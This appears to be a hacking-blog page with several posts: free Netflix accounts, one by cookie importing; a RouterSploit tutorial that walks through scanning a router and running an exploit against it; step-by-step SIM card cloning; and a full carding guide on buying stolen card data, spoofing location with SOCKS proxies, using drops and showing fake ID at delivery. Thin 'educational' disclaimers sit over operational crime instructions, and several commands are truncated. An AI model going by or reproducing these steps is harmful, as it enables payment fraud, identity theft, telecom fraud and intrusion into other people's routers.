Pages

Pages - Menu

Pages - Menu

Friday, 22 June 2018

【PART 2】Get Netflix Premium Account For Free With Android With Username & Password [Unlimited Account] 



I will let you know a simple trick with My Airtel App from Google Play store to get Netflix premium account for free without use of real debit or credit card for 1 month and you can again make another account via same method in 2nd month so you can enjoy unlimited account in this way. This is not a hack this is legal and proper way to activate the trial Netflix account.

Download App :-  Tech Gyan Mantra


This video is only for Educational purpose and in legal way. Please do not use information in video for any illegal activity for which Tech Gyan Mantra will not be responsible.


Exploit a Router Using RouterSploit


WATCH VIDEO:-





Special Thanks :-  Nitesh Singh【H4CK3R】



FOR HACKING COURSE:-

WHATSAPP :-  +16366780163

Wednesday, 20 June 2018

Exploit a Router Using RouterSploit


we're exploring RouterSploit, which shows you just how easy it is to get started with router hacking — even if you're a beginner white hat hacker or pentester. This program A router is the core of anyone's internet experience, but most people don't spend much time setting up this critical piece of hardware. Old firmware, default passwords, and other configuration issues continue to haunt many organizations. Exploiting the poor, neglected computer inside these routers has become so popular and easy that automated tools have been created to make the process a breeze.

In this hacking tutorial, we'll learn how to use RouterSploit , a tool for automating the process of router exploitation. But before we dive right in, let's get a little background information on the tools available and why router exploitation is so big. on Linux distros like Kali, macOS, and Windows.




Download App:- Tech Gyan Mantra




The Basics Behind Router Exploitation



Router exploitation works by breaching the Wi-Fi security of a router, bypassing the administrative login page, and accessing administrative features. A skilled attacker can then target the existing firmware that runs the router in a practice called "rootkitting" in which custom firmware is dropped into the router to enable advanced malicious features.

Depending on the goals and resources of an attacker, this can include spying on the user and any connected devices, injecting malware into the browser to exploit connected devices, enabling advanced spear-phishing attacks, and routing illegal traffic for criminal activities through exploited routers.



Government Router Hacking with Cherry Blossom Government agencies like the NSA and CIA hoard exploits for routers, and the ShadowBrokers have threatened to release these exploits on the heels of the Windows SMB leaks that spawned WanaCry (or WannaCry) . If they follow through with the threats to leak router exploits in June, tools like Cherry Blossom could become mainstream.


How To Clone Your Sim Card.complete Method These tools from the NSA and CIA control entire networks of infected routers, transforming them into advanced, on-site wireless espionage devices. Why plant a fancy spying device when you can just turn a home router into one? Cherry Blossom is a rootkitting master framework, in which routers are automatically exploited and converted into "flytraps." A flytrap is a router that has been compromised and updated with special firmware that prevents the user from updating or modifying the new firmware.



Cherry Blossom can control many "flytraps," providing instant access to advance spying devices located in the home or work of a target.
Image via Cherry Blossom Quick Start Guide / WikiLeaks / CIA




The flytrap establishes a "beacon" back to a command-and-control server called "Cherryweb," and is then assigned "missions" by an operator via an encrypted VPN tunnel. Advanced modules, like "Windex," which performs a drive-by malware injection attack against any connected target, can turn a flytrap into an advanced remote espionage platform capable of being controlled from anywhere.


Cherry Blossom displaying mission commands to be sent to flytrap devices, including shell code, recon scripts, and exploits. Some poor guy is going to get his Cherry Blossomed.
Image via Cherry Blossom Quickstart Guide / WikiLeaks / CIA


Criminal IoT & Router Hacking


Aside from the espionage application the CIA focuses on, exploitable routers and IoT devices are commonly targeted because of their routing ability. RouterSploit, the tool we're working with today, doesn't just compromise routers, it can also go after webcams and other connected devices.


While the CIA uses VPN connections to hide traffic to and from command-and-control servers, cybercriminals will use these devices to proxy malicious traffic to avoid detection. In fact, networks of these infected routers and IoT devices are sold as black market proxies for hiding illegal activity like credit card theft, darknet transactions, and DDoS attacks. By failing to secure your router, you could be signing up to relay traffic for criminal hacking enterprises.


Beginner Router Hacking


While simply trying the default password is the first step towards router exploitation, more advanced frameworks exist even for beginners. Why would a beginner want to exploit a router? On a local level, if you fully compromise the router, you will have complete access to the network. This allows you to control and route the target's internet experience to wherever or whatever you want or forward ports for remote access.


You should consider a router as an early and productive target to take on during the stages of an engagement. Even if you're a beginner, simply running the Autopwn scanner on RouterSploit will automatically test a range of vulnerabilities against a target IP address, reducing the process of finding a potential exploit to a matter of seconds.



What Is RouterSploit ?


RouterSploit is a handy Python program which automates most of the tasks associated with compromising a router. Modeled after
Metasploit , its commands will be familiar to anyone used to the Metasploit framework. It contains scanning and exploit modules and is available for Kali Linux (and macOS or Mac OS X if you want).



Once you associate with a target network, running a scan will reveal whether a router can be easily exploited through the framework. Today, we will be going over the Autopwn feature to identify vulnerabilities on routers and connected devices quickly.


Getting It Running — What You' ll Need


RouterSploit is great because it runs on Kali Linux, our Kali Raspberry Pi , macOS or Mac OS X, Windows, and even on an unrooted Android phone. To start, we'll need to take care of some dependencies and ensure Python is installed. Aside from that, compromising a router has never been easier from any device you have handy.





STEP:- 1


Installing Python & Dependencies


To proceed, we'll need to ensure we have Python installed, and you'll also need some of the following packages.

  • Python3 (with pip)
  • Requests
  • Paramiko
  • Beautifulsoup4
  • Pysnmp
  • Gnureadline (macOS / Mac OS X only)

You can install them all

 by using apt-get :


apt-get install python3-pip request


STEP:-  2


Installing RouterSploit on Mac , Kali & Others


git clone https://github.com/threa cd routersploit python3 -m pip install -r requirem python3 rsf.py


On macOS or Mac OS X, the method is similar. In a terminal window, type:


git clone https://github.com/threa cd routersploit sudo easy_install pip sudo pip install -r requirements.t



STEP :- 3

Running RouterSploit


For our first run, connect your computer to a network with a router you'd like to scan. Navigate to the RouterSploit folder and run RouterSploit by typing the following commands.



cd cd routersploit sudo python ./rsf.py


The RouterSploit framework will open up, and you'll see that it bears a striking similarity to the Metasploit framework, both in interface style and workflow.



A command-line interface lets you input simple commands to scan and exploit routers, and you can see everything RouterSploit has to offer by typing:


show all


As you can see in the below output, there are lots of exploits, default creds, and scanners! How fun.



creds/generic/snmp_bruteforce creds/generic/telnet_default creds/generic/ssh_default creds/generic/ftp_bruteforce creds/generic/http_basic_digest_br creds/generic/ftp_default creds/generic/http_basic_digest_de creds/generic/ssh_bruteforce creds/generic/telnet_bruteforce creds/routers/ipfire/ssh_default_c creds/routers/ipfire/telnet_defaul creds/routers/ipfire/ftp_default_c creds/routers/bhu/ssh_default_cred creds/routers/bhu/telnet_default_c creds/routers/bhu/ftp_default_cred creds/routers/linksys/ssh_default_ creds/routers/linksys/telnet_defau creds/routers/linksys/ftp_default_ creds/routers/technicolor/ssh_defa creds/routers/technicolor/telnet_d creds/routers/technicolor/ftp_defa creds/routers/asus/ssh_default_cre creds/routers/asus/telnet_default_ creds/routers/asus/ftp_default_cre creds/routers/billion/ssh_default_ creds/routers/billion/telnet_defau creds/routers/billion/ftp_default_ creds/routers/zte/ssh_default_cred creds/routers/zte/telnet_default_c creds/routers/zte/ftp_default_cred creds/routers/ubiquiti/ssh_default creds/routers/ubiquiti/telnet_defa creds/routers/ubiquiti/ftp_default creds/routers/asmax/ssh_default_cr creds/routers/asmax/telnet_default creds/routers/asmax/ftp_default_cr creds/routers/asmax/webinterface_ht creds/routers/huawei/ssh_default_c creds/routers/huawei/telnet_defaul creds/routers/huawei/ftp_default_c creds/routers/tplink/ssh_default_c creds/routers/tplink/telnet_defaul creds/routers/tplink/ftp_default_c creds/routers/netgear/ssh_default_ creds/routers/netgear/telnet_defau creds/routers/netgear/ftp_default_ creds/routers/mikrotik/ssh_default creds/routers/mikrotik/telnet_defa creds/routers/mikrotik/ftp_default creds/routers/mikrotik/api_ros_def creds/routers/movistar/ssh_default creds/routers/movistar/telnet_defa creds/routers/movistar/ftp_default creds/routers/dlink/ssh_default_cr creds/routers/dlink/telnet_default creds/routers/dlink/ftp_default_cr creds/routers/juniper/ssh_default_ creds/routers/juniper/telnet_defau creds/routers/juniper/ftp_default_ creds/routers/comtrend/ssh_default creds/routers/comtrend/telnet_defa creds/routers/comtrend/ftp_default creds/routers/fortinet/ssh_default creds/routers/fortinet/telnet_defa creds/routers/fortinet/ftp_default creds/routers/belkin/ssh_default_c creds/routers/belkin/telnet_defaul creds/routers/belkin/ftp_default_c creds/routers/netsys/ssh_default_c creds/routers/netsys/telnet_defaul creds/routers/netsys/ftp_default_c creds/routers/pfsense/ssh_default_ creds/routers/pfsense/webinterface_ creds/routers/zyxel/ssh_default_cr creds/routers/zyxel/telnet_default creds/routers/zyxel/ftp_default_cr creds/routers/thomson/ssh_default_ creds/routers/thomson/telnet_defau creds/routers/thomson/ftp_default_ creds/routers/netcore/ssh_default_ creds/routers/netcore/telnet_defau creds/routers/netcore/ftp_default_ creds/routers/cisco/ssh_default_cr creds/routers/cisco/telnet_default creds/routers/cisco/ftp_default_cr creds/cameras/grandstream/ssh_defa creds/cameras/grandstream/telnet_d creds/cameras/grandstream/ftp_defa creds/cameras/basler/ssh_default_c creds/cameras/basler/webinterface_ creds/cameras/basler/telnet_defaul creds/cameras/basler/ftp_default_c creds/cameras/avtech/ssh_default_c creds/cameras/avtech/telnet_defaul creds/cameras/avtech/ftp_default_c creds/cameras/vacron/ssh_default_c creds/cameras/vacron/telnet_defaul creds/cameras/vacron/ftp_default_c creds/cameras/acti/ssh_default_cre creds/cameras/acti/webinterface_ht creds/cameras/acti/telnet_default_ creds/cameras/acti/ftp_default_cre creds/cameras/sentry360/ssh_defaul creds/cameras/sentry360/telnet_def creds/cameras/sentry360/ftp_defaul creds/cameras/siemens/ssh_default_ creds/cameras/siemens/telnet_defau creds/cameras/siemens/ftp_default_ creds/cameras/american_dynamics/ss creds/cameras/american_dynamics/te creds/cameras/american_dynamics/ft creds/cameras/videoiq/ssh_default_ creds/cameras/videoiq/telnet_defau creds/cameras/videoiq/ftp_default_ creds/cameras/jvc/ssh_default_cred creds/cameras/jvc/telnet_default_c creds/cameras/jvc/ftp_default_cred creds/cameras/speco/ssh_default_cr creds/cameras/speco/telnet_default creds/cameras/speco/ftp_default_cr creds/cameras/iqinvision/ssh_defau creds/cameras/iqinvision/telnet_de creds/cameras/iqinvision/ftp_defau creds/cameras/avigilon/ssh_default creds/cameras/avigilon/telnet_defa creds/cameras/avigilon/ftp_default creds/cameras/canon/ssh_default_cr creds/cameras/canon/telnet_default creds/cameras/canon/ftp_default_cr creds/cameras/canon/webinterface_ht creds/cameras/hikvision/ssh_defaul creds/cameras/hikvision/telnet_def creds/cameras/hikvision/ftp_defaul creds/cameras/dlink/ssh_default_cr creds/cameras/dlink/telnet_default creds/cameras/dlink/ftp_default_cr creds/cameras/honeywell/ssh_defaul creds/cameras/honeywell/telnet_def creds/cameras/honeywell/ftp_defaul creds/cameras/samsung/ssh_default_ creds/cameras/samsung/telnet_defau creds/cameras/samsung/ftp_default_ creds/cameras/axis/ssh_default_cre creds/cameras/axis/telnet_default_ creds/cameras/axis/ftp_default_cre creds/cameras/axis/webinterface_ht creds/cameras/arecont/ssh_default_ creds/cameras/arecont/telnet_defau creds/cameras/arecont/ftp_default_ creds/cameras/brickcom/ssh_default creds/cameras/brickcom/telnet_defa creds/cameras/brickcom/ftp_default creds/cameras/brickcom/webinterface creds/cameras/mobotix/ssh_default_ creds/cameras/mobotix/telnet_defau creds/cameras/mobotix/ftp_default_ creds/cameras/geovision/ssh_defaul creds/cameras/geovision/telnet_def creds/cameras/geovision/ftp_defaul creds/cameras/stardot/ssh_default_ creds/cameras/stardot/telnet_defau creds/cameras/stardot/ftp_default_ creds/cameras/cisco/ssh_default_cr creds/cameras/cisco/telnet_default creds/cameras/cisco/ftp_default_cr payloads/perl/bind_tcp payloads/perl/reverse_tcp payloads/python/bind_tcp payloads/python/reverse_tcp payloads/python/bind_udp payloads/python/reverse_udp payloads/mipsbe/bind_tcp payloads/mipsbe/reverse_tcp payloads/armle/bind_tcp payloads/armle/reverse_tcp payloads/x86/bind_tcp payloads/x86/reverse_tcp payloads/php/bind_tcp payloads/php/reverse_tcp payloads/cmd/php_reverse_tcp payloads/cmd/python_reverse_tcp payloads/cmd/python_bind_tcp payloads/cmd/perl_reverse_tcp payloads/cmd/netcat_reverse_tcp payloads/cmd/awk_reverse_tcp payloads/cmd/awk_bind_tcp payloads/cmd/bash_reverse_tcp payloads/cmd/php_bind_tcp payloads/cmd/awk_bind_udp payloads/cmd/netcat_bind_tcp payloads/cmd/perl_bind_tcp payloads/cmd/python_reverse_udp payloads/cmd/python_bind_udp payloads/x64/bind_tcp payloads/x64/reverse_tcp payloads/mipsle/bind_tcp payloads/mipsle/reverse_tcp scanners/autopwn scanners/misc/misc_scan scanners/routers/router_scan scanners/cameras/camera_scan exploits/generic/shellshock exploits/generic/ssh_auth_keys exploits/generic/heartbleed exploits/misc/asus/b1m_projector_r exploits/misc/wepresent/wipg1000_r exploits/misc/miele/pg8528_path_tr exploits/routers/ipfire/ipfire_oin exploits/routers/ipfire/ipfire_pro exploits/routers/ipfire/ipfire_she exploits/routers/2wire/gateway_aut exploits/routers/2wire/4011g_5012n exploits/routers/bhu/bhu_urouter_r exploits/routers/linksys/1500_2500 exploits/routers/linksys/smartwifi exploits/routers/linksys/wrt100_11 exploits/routers/linksys/wap54gv3_ exploits/routers/technicolor/tg784 exploits/routers/technicolor/tc720 exploits/routers/technicolor/dwg85 exploits/routers/technicolor/tc720 exploits/routers/asus/infosvr_back exploits/routers/asus/rt_n16_passw exploits/routers/billion/billion_52 exploits/routers/billion/billion_77 exploits/routers/zte/f460_f660_bac exploits/routers/zte/zxv10_rce exploits/routers/ubiquiti/airos_6_ exploits/routers/asmax/ar_1004g_pa exploits/routers/asmax/ar_804_gu_r exploits/routers/huawei/hg520_info exploits/routers/huawei/hg866_pass exploits/routers/huawei/hg530_hg52 exploits/routers/huawei/e5331_mifi exploits/routers/tplink/wdr740nd_w exploits/routers/tplink/archer_c2_ exploits/routers/tplink/wdr740nd_w exploits/routers/tplink/wdr842nd_w exploits/routers/netgear/jnr1010_p exploits/routers/netgear/n300_auth exploits/routers/netgear/multi_pass exploits/routers/netgear/dgn2200_d exploits/routers/netgear/prosafe_rc exploits/routers/netgear/r7000_r64 exploits/routers/netgear/multi_rce exploits/routers/netgear/wnr500_61 exploits/routers/netgear/dgn2200_p exploits/routers/mikrotik/routeros exploits/routers/movistar/adsl_rou exploits/routers/dlink/dsp_w110_rc exploits/routers/dlink/dgs_1510_ad exploits/routers/dlink/dir_645_815 exploits/routers/dlink/dir_815_850 exploits/routers/dlink/dir_300_320 exploits/routers/dlink/dir_645_pas exploits/routers/dlink/dir_850l_cr exploits/routers/dlink/dvg_n5402sp exploits/routers/dlink/dsl_2640b_d exploits/routers/dlink/dcs_930l_au exploits/routers/dlink/dir_825_pat exploits/routers/dlink/multi_hedwi exploits/routers/dlink/dns_320l_32 exploits/routers/dlink/dsl_2730_27 exploits/routers/dlink/dsl_2750b_i exploits/routers/dlink/dir_300_600 exploits/routers/dlink/dwl_3200ap_ exploits/routers/dlink/dsl_2740r_d exploits/routers/dlink/dir_8xx_pas exploits/routers/dlink/dwr_932b_ba exploits/routers/dlink/dsl_2730b_2 exploits/routers/dlink/dwr_932_inf exploits/routers/dlink/dir_300_320 exploits/routers/dlink/dsl_2750b_r exploits/routers/dlink/multi_hnap_ exploits/routers/dlink/dir_300_645 exploits/routers/3com/ap8760_passw exploits/routers/3com/imc_path_tra exploits/routers/3com/officeconnec exploits/routers/3com/officeconnec exploits/routers/3com/imc_info_dis exploits/routers/comtrend/ct_5361t exploits/routers/fortinet/fortigate exploits/routers/multi/rom0 exploits/routers/multi/tcp_32764_r exploits/routers/multi/misfortune_ exploits/routers/multi/tcp_32764_i exploits/routers/multi/gpon_home_g exploits/routers/belkin/g_plus_inf exploits/routers/belkin/play_max_p exploits/routers/belkin/n150_path_ exploits/routers/belkin/n750_rce exploits/routers/belkin/g_n150_pas exploits/routers/belkin/auth_bypas exploits/routers/netsys/multi_rce exploits/routers/shuttle/915wm_dns exploits/routers/zyxel/d1000_rce exploits/routers/zyxel/p660hn_t_v2 exploits/routers/zyxel/d1000_wifi_ exploits/routers/zyxel/zywall_usg_ exploits/routers/zyxel/p660hn_t_v1 exploits/routers/thomson/twg850_pa exploits/routers/thomson/twg849_in exploits/routers/netcore/udp_53413 exploits/routers/cisco/secure_acs_ exploits/routers/cisco/catalyst_29 exploits/routers/cisco/ucs_manager exploits/routers/cisco/unified_mult exploits/routers/cisco/firepower_m exploits/routers/cisco/firepower_m exploits/routers/cisco/video_surv_ exploits/routers/cisco/dpc2420_inf exploits/routers/cisco/ios_http_au exploits/routers/cisco/ucm_info_di exploits/cameras/grandstream/gxv36 exploits/cameras/grandstream/gxv36 exploits/cameras/mvpower/dvr_jaws_ exploits/cameras/siemens/cvms2025_ exploits/cameras/avigilon/videoiq_ exploits/cameras/xiongmai/uc_httpd exploits/cameras/dlink/dcs_930l_93 exploits/cameras/honeywell/hicc_11 exploits/cameras/brickcom/corp_net exploits/cameras/brickcom/users_cg exploits/cameras/multi/P2P_wificam exploits/cameras/multi/dvr_creds_d exploits/cameras/multi/jvc_vanderb exploits/cameras/multi/netwave_ip_ exploits/cameras/multi/P2P_wificam generic/bluetooth/btle_enumerate generic/bluetooth/btle_scan generic/bluetooth/btle_write generic/upnp/ssdp_msearch rsf >


To begin, we'll start with a scan against a target router, which will check to see if each and every vulnerability might work against it. It will return a list at the end of the scan with every exploit that will work against the target — no research required.



STEP:- 4

Scanning a Target


We will be using Autopwn scanner to find any vulnerabilities that apply to our target. Locate the IP address of the router, and save it, because we'll need it to input it shortly. Most of the time, the router is at 192.168. 0.1, but this can change. You can use Fing or ARP-scan to find the IP address if you don't know it.


After starting RouterSploit, enter the Autopwn module by typing the following commands.



use scanners/autopwn show options

This is very similar to Metasploit. To get around, type use and then whatever module you want to use, show options to show the variables of that module you've selected, set to set any of the variables you see from the show options command, and finally, run to execute the module. Pretty simple. To close out of the module and take you to the main screen, type
exit .



   


In this case, we will set the target to the IP address of the router. Type set target and then the IP address of the router, then press enter. Finally, type run to begin the scan.


rsf (AutoPwn) > set target 10.11.0  [+] {'target': '10.11.0.4'} rsf (AutoPwn) > run



STEP:-  5

Selecting & Configuring the Exploit


After the scan is complete, we'll be left with a list of vulnerabilities it finds. We can pick from this list to decide which exploit best suits our needs. Here, we see a router with many vulnerabilities.



[*] Elapsed time:  ``9.301568031 s
[*] Could not verify exploitabilit  - exploits/routers/billion/5200w_  - exploits/routers/cisco/catalyst  - exploits/routers/cisco/secure_a  - exploits/routers/dlink/dir_815_  - exploits/routers/dlink/dsl_2640  - exploits/routers/dlink/dsl_2730  - exploits/routers/dlink/dsl_2740  - exploits/routers/netgear/dgn220  - exploits/routers/shuttle/915wm_
[*] Device is vulnerable:  - exploits/routers/3com/3crads172  - exploits/routers/3com/officialc  - exploits/routers/dlink/dcs_9301  - exploits/routers/dlink/dir_300_  - exploits/routers/ipfire/ipfire_  - exploits/routers/linksys/1500_2  - exploits/routers/netgear/prosaf  - exploits/routers/zyxel/zywall_u  - exploits/routers/dlink/dcs_9301
rsf (AutoPwn) >



Let's start with a simple exploit on one of these vulnerable routers, some revealing information disclosure. To use this exploit, we'll enter the following commands.




use exploits/routers/3com/3cradsl7 show options


A list of the variables will come up, and you'll be able to set your target by typing:


set target <target router IP> check



This will set the target and confirm it is vulnerable.






STEP :- 6


Running the Exploit


The target looks good and vulnerable. To fire the payload, type run .


rsf (3Com 3CRADSL72 Info Disclosur 

 [*] Running module... 
 [*] Sending request to download s /Library/Frameworks/Python.framewo 

 [+] Exploit success  

[*] Reading /app_sta.stm file 

<!doctype html> 
<html class=""> 
<!--



If the exploit is successful, you should be greeted with internal configuration settings that can leak the login and password of users, default passwords, and device serial number, among other settings that allow you to compromise the router. Other modules allow you to remotely inject code or directly disclose the router password. Which you can run depends on what the target router is vulneralibilty.

WATCH VIDEO:-


       


   

Sunday, 10 June 2018

HOW TO CLONE YOUR SIM CARD.Complete Method



Note:- This article is only for educational purpose if you do any illegal work Tech Gyan Mantra is not responsible for that.

Our sim cards contain two secret codes or keys called (imsi value and ki value) which enables the operator to know the mobile number and authenticate the customer ,these codes are related to our mobile numbers which the operators store in their vast data base,it is based on these secret keys that enables the billing to be made to that customer. now what we do in sim cloning is extract these two secret codes from the sim and programmed it into a new blank smart card often known as wafer, since the operator authentication on sims is based on these values,it enables us to fool the operators in thinking that its the original sim,this authentication is a big flaw concerning GSM technology.


Netfilx =>How To Get Premium Netflix Account For Free For Life Time Daily


Cloning a card:-


Sim cards are manufactured on the basis of 3 algorithms COMP128v1,COMP128v2 and
COMP128v3 now an important note currently only COMP128v1 version sim cards can be cloned ,since this is the only algorithm which has been cracked by users, bear in mind that 70% of all the sim cards we use are COMP128v1 . Call network provider, they will ask for your phone number, your account info, name and security code, then they will ask why you want to unlock your SIM card, just tell them you need to unlock your SIM to get it to work with your overseas phone or something.

Download App:- Tech Gyan Mantra


1. Buy a SIM card Reader




2. Need a Blank SIM card or super SIM card


3. Download and install MagicSIM


4. Download and install USB SIM Card Reader Software 3.0.1.5


5. Go in phone tools, select SIM card, then select unlock SIM, it will prompt for a code.


6. Once they give you the SIM unlock code, enter it, and it will say SIM
unlocked.


7. Remove the SIM from your phone, place it in the card reader, click read from card in magic SIM the application.


8. When it displays ‘connected’, select crack SIM in the tool bar. Click strong ki and select all of the other find options and then click start.


9. Once your ki is found and the crack is finished, click file, save as and save your
cracked SIM info to a file.


10. IMPORTANT!!! You must click disconnect from the file menu or you will ruin your SIM card. Once it says disconnected, remove the SIM. Put the SIM in your phone and see if it still works, it should. (If not, either you did not unlock your SIM, or you tried to copy it instead of crack and save.)


11. Insert blank 3g card USB SIM Card Reader
Software3.0.1.5 , not magic SIM at this point.


12. Click connect


13. It should say ‘No Info Found’ if it is truly blank.


14. Select write to SIM, it will prompt you to select a dat file, select the one you saved earlier. Now click start, it will take about 10 minutes to write it, once it is complete, it will ask for a security code, enter the security code the network provider gave you, then click finish.


15. Your card is now cloned. It should be noted that if you try to make two calls at the same time, one will connect; the other will say call failed, both phones will get the same messages, text and voice, and both will receive the same calls, but only one can talk at a time.



Disclaimer : This process is illegal, i will not be responsible for any loss which arises due to this tricks. The above mentioned trick is only for educational purpose.



FOR HACKING COURSE:-

WHATSAPP :- +16366780163

Sunday, 3 June 2018

Netfilx =>How To Get Premium Netflix Account For Free For Life Time Daily


I will tell you the best method to get free Netflix account or to get premium Netflix account for free for life time daily with cookie importing method with the help of a famous chrome extension Edit this cookie. Keep in mind this is the latest and working method to get Netflix accounts for free.



This video is only for Educational purpose and in legal way. Please do not use information in video for any illegal activity for which Tech Gyan Mantra will not be responsible for that.



WATCH VIDEO:-




Special Thanks :- N!tish S!ngh(Ethical Hacker)




FOR HACKING COURSE :-

WHATSAPP :-  +16366780163

Thursday, 31 May 2018

What is Carding? A Complete Carding Tutorial for Beginners


This Article is Only for Educational purpose.If you do any Illegal work Tech Gyan mantra is Not Responsibile for That.


Carding is a Method of Stealing the Information of Someone’s Credit Card and Using it to Buy Things from Online Stores, Using with the Access of that Credit Card. Thieves or Hackers, Who Steals these details Usually Calls Carders. They Buy Goods with these Credit Cards or Sell’s it Online. Below I have Included the Methods, That they Use in Carding. This is A Complete Guide to What is Carding? And How to Do Carding. This Guide Consists a Complete Carding Tutorial, So you can Learn All About Carding. I also Include List of Some Credit Card Dump Sites and Carding Forums so you can Clear your All Thoughts.

Download App:- Tech Gyan Mantra


Carding is not Easy, As Simply Going to Site and Buy Some Stuff. If you want to Learn Carding, you have to Give it time and Practice and Have to use your Mind Yourself. I will just provide some Great Carding Techniques, A Complete Carding Tutorial, List of Some Dump Sites and Links of Carding Forums But you have to Learn it own. The Success Rate in Carding is very low Because Nowadays, Many Sites get you and Cancel your Order, So It needs very Patience and Time to learn it. This is a Guide for Especially a Noobie If he Wants to learn Carding. So Read Full Post, And If you will have any Doubt, Just Hit the comment Section, Below the Post. ????



Note: Carding is an Illegal Process, I don’t Recommend anyone to try this. This Carding Tutorial is only for Educational Purpose. If you try to do Carding, Then I will not Responsible for Any Damage.



What is Carding?

Carding is a Process, Where a User or Carder purchase Goods from a Hacked or Stolen Credit Card Details. Hackers Steal the Details of Credit Cards And then Buy Stuff from these details. Carding is an Art of Technique, If you want to learn Carding, You have to give it your time. If you are Noob, Then it is expected that you’ll fail some times, But the Key of Success is, Not to Stop and Keep Practicing.


The Success Rate for Carding is very Low, As their if the Site gets any Unknown Transaction from a Hacked or Stolen Credit Card info, They Usually Reversed the Transaction or Cancel the Order Placement.


However, Carding can Only be Done using US Cards, As these Cards does not require any Pin Verification or OTP’s. So If you are Using an Indian Credit Card, Then It is Highly Secured as they Won’t Work Without OTP Verification or 3D Secure Verification Unless International Transaction Mode is Enabled.



How to do Carding? Complete Carding Tutorial

Basic Things You Need for Carding: Carding Tutorial

There may be So many Things, But I have Added the Most Important and Basic Ones in this List, Below I also Explained What these things are, And How it will help you in Learning and Understanding this Carding Tutorial. ????


  • A Computer
  • CC Cleaner or All in One Cleaner
  • MAC Address Changer
  • SOCKS
  • CC
  • RDP (Optional)
  • Drop( Optional)


Computer

Well, This is an Essential part, If you are going to do Carding. For Carding, I will Always prefer you to Use Computer because it has so many things and It is the Safest Way to Card. Many of Carders Use Mobile for Carding But It is not Safe, So I Prefer having a Computer First. But If you don’t have a Computer, then I have included the Safest way to Card with Smartphone. You can Check that Below. ????


CC Cleaner

It is a very Useful tool that mainly uses for Cleaning all the Browsing History, Clearing Cookies, Caches and Temp Files. This is a very handy tool, But not so many people know about it. Flash cookies are different from Regular Cookies, As they don’t Ask for permission to Install Cookies on your PC, and Saves All the info in your Browser, This Tool Even Clear all the Flash Cookies As Well. ????


MAC Address Changer

It is a Unique Identifier, That Assigned in an Network Interface Card. It is Unique of Every Computer. MAC Address Changer Allows you to spoof MAC Address of your Computer.


Socks

It is a Network Internet Protocol, Which Mainly Routes Network Packets between Server and Client using a Proxy Server. So, We’ll use it for Hiding Our Main Location and Proving a Fake Location to the location of Credit Card’s Holder for Making the Transaction Successful. Generally, It is more Secure than the VPN, as It won’t leak your DNS Details.




RDP

RDP Also knows as Remote Desktop Protocol, Which Allows you to graphically connect with a Computer Over a Network. It will connect you with any Computer Connected as an RDP on Any Country and Make yourself Anon. This is not Required but you can Use it for Safety Purposes.


Drop

Well, It is a Service, Which usage for getting Shipping Address for Carding. Suppose If you are from Pakistan And Carding with a US Credit Card. If you’ll add Delivery Address as Pakistan then There are so many chances to Cancel the Order, But If you will use a US Address, then there will be 95% Chances of Order Success. If you have any Relatives their than It is OK, But If you don’t have anyone than This service will help you. It will provide you an Address of that country, And Take Delivery and then Send that Parcel to you. it charges some money for it, But It will be worth in Investing in it. ????



Credit Card

This is the Essential Part of Carding, If you Understand what is it, Half of your Work will End Up Here. Whenever you’ll buy a Credit Card from any Online Shop, you will receive it in a Virtual Notepad File or Something with the Below format.



Types of Credit Cards

Below I Have Added some types of CC, You’ll Get while Buy it from Any Shop. ????
Regular Credit Card

NAME:
ADDRESS:
CITY:
STATE:
ZIP CODE:
TEL. BILLING NUMBER:
CARD NUMBER:
CARD EXP DATE:
CVV CODE:

Well, This is the Minimum Information you’ll get from a CC whenever you’ll Buy it. If you’ll not Get any of these Details, Then you can’t do anything with that CC. You are Out of Luck this Time. With this CC you can Card Simple Sites.


Partial Full-Info CC


In these Card, You will get some Additional Information with the Details Mention Above. This Information are
Social Security Number (SSN):

Date Of Birth (DOB):

******’s Maiden Name (MMN):
with the Help of this Info, You can Even Card C2IT and Even Paypal. So this is Great if you’ll get these Details too. ????



Full-Info Credit Card

This Card Provides you full Details in it. 

These Details are Below

  • BANK ACCOUNT NUMBER:
  • ROUTING NUMBER:
  • BANK NAME:
  • BANK NUMBER:
  • DRIVERS LICENSE NUMBER:
  • PIN NUMBER (For CC or ATM card)

If you’ll have this info, You can Card Anything. Yes, I said Anything.




Types of Credit Cards

Below are some of the Companies, Which Provides Credit Cards. I must Suggest you Use AMEX Premium, As It has mainly Usage by Many of the Carders. These Companies are

AMEX
VISA
DISCOVER
MasterCard


BIN- What is It?

BIN Stands for Bank Identification Number, It is the First 6 Digits of your Credit Card, Suppose if your Credit card number is 4305873969346315
this, Then your BIN will be 430587. I will suggest you Collect some Information Related to BIN, This may help you in Learning Carding Easily. For BIN’s Bins.Pro And BinLists are Best. This will help you in Learning Almost Everything about Bins. Must Do a check at these sites.


How to Card? Carding Tutorial

Well, Before Starting makes Sure you have gathered all the Required Things I Earlier Mentioned in the Post. For the Links of Download and Purchase See the End of Post. ????

Set Up Socks in Mozilla

Just Open Firefox, Than Go to Options and Click on Advanced Settings. After that go to Network and then A Pop-Up will appear. Select the fourth option of Manual Proxy Configuration. Now type the Proxy and Port Below, That’s it.

After Adding the Proxy there, Just Hit OK and Restart the Firefox and Now you’ll be Connected with Secure Socks.


Note: Make Sure to Buy Socks with the Matching Location of the Address in Credit Card. Suppose If Credit Card holder is From South Africa, Your Socks are also of South Africa.




How to Carding? Step By Step Tutorial of Carding

1. Create a New Email Account with the Matching Name of CC Holder, If CC Holder Name is Smith Parker then Make Something Like rdxanon78@***.com

Note: Never Use Disposable Emails for Carding.

2. Run RDP and Connect with your Host, In case if you are not Using RDP Follow the Steps Below-

3. Change All the MAC Addresses Using MAC Address Changer.


4. Clear All the History of Your PC Including Cache, Temp Files using CC Cleaner.


5. Set Up Sock5 in Mozilla Firefox, Check Above I Have Explained How to Setup Socks in Mozilla.


6. Now, Restart your Browser and Visit This link to Check is your IP Changed with the Location of CC holder or Not.


7. Open Any Local Online Market Store, I will suggest you Use anyone which is from your own country.


8. Register Account with the Name of CC Holder and Email you made for Carding.


9. Try to Add an Item to your Cart, The item should Below USD $500, Never use Big Orders for the First Transaction.

10. In Shipping Address, Add the Address where you want to Deliver the Product.


11. Now, Go for the Payment Option, Choose Credit Card for Payment. ????

12. Enter All the Credit Card Details you Received when you bought the Credit Card.

13. For Billing Address, Use the Address of CC Holder.

If you follow all the Steps Above, your Order will be Successfully Placed. Now wait for Order to Arrive, When the Order will arrive, the Courier boy will make a Call to you, And When you’ll go for taking the Product, he will ask you for Any ID Proof, Try to Provide them any Fake ID, or If you’ll not able to make Fake ID, Comment, we’ll make one for You. ????



Note: Never try to Give real ID Proof while getting the Delivery.

How to Card with Android Smartphone

